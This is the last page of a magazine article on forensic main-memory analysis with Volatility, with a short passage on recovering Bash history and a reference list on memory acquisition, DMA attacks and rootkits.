« Previous 1 2 3
Forensic main memory analysis with Volatility
Fingerprints
Interpretation Needed
Analyzing the Bash history (Figure 3) is useful for detecting user misbehavior. Volatility also detects commands if the length of the history has been changed to zero and its location to /dev/null
to hide the last entries.
The real challenge in using Volatility, as with all analysis tools, is not so much using the correct parameters, but interpreting the program's output correctly. Only practice and a good knowledge of the system with all its data structures will be useful.
Infos
- Volatility: https://www.volatilityfoundation.org
- Volatility and VMware: https://github.com/volatilityfoundation/volatility/wiki/VMware-Snapshot-File
- Volatility and VirtualBox: https://github.com/volatilityfoundation/volatility/wiki/Virtual-Box-Core-Dump
- Skorobogatov, S. Low Temperature Data Remanence in Static RAM. University of Cambridge Computer Laboratory Technical Report 536, 2002: https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-536.pdf
- Becher, M., M. Dornseif, and C.N. Klein. "FireWire: All Your Memory are Belong to Us." A presentation at CanSecWest Core05, 2005: https://cansecwest.com/core05/2005-firewire-cansecwest.pdf
- "DMA attacking over USB-C and Thunderbolt 3" by Ulf Frisk, 2016: http://blog.frizk.net/2016/10/dma-attacking-over-usb-c-and.html
- Inception: https://github.com/carmaa/inception
- FitzPatrick, J., and M. Crabill. "Stupid PCIe Tricks featuring NSA Playset: PCIe." YouTube video of presentation at DEF CON 22 Hacking Conference, 2014: https://www.youtube.com/watch?v=OD2Wxe4RLeU
- Linux Memory Grabber: https://github.com/halpomeranz/lmg
- "Host-Based IDS" by Tobias Eggendorfer, Linux Pro Magazine , issue 183, February 2016, pg. 12, http://www.linuxpromagazine.com/Issues/2016/183/Host-Based-IDS
- Stuttgen, J., and M. Cohen, "Anti-Forensic Resilient Memory Acquisition" In: Proceedings of The Digital Forensic Research Conference, DFRWS 2013 (Monterey, CA, USA, 2013), http://dfrws.org/sites/default/files/session-files/paper-anti-forensic_resilient_memory_acquisition.pdf
- Volatility profiles for Linux: https://github.com/volatilityfoundation/volatility/wiki/Linux
- Ligh, M.H., A. Case, J. Levy, and A. Walters. The Art of Memory Forensics , Wiley, 2014: https://www.memoryanalysis.net/amf
- "Kernel Rootkits" by Jürgen Quade, Linux Pro Magazine , issue 147, February 2013, p. 30, http://www.linuxpromagazine.com/Issues/2013/147/Kernel-Rootkits
« Previous 1 2 3
Buy this article as PDF
Express-Checkout as PDF
Price $2.95
(incl. VAT)
(incl. VAT)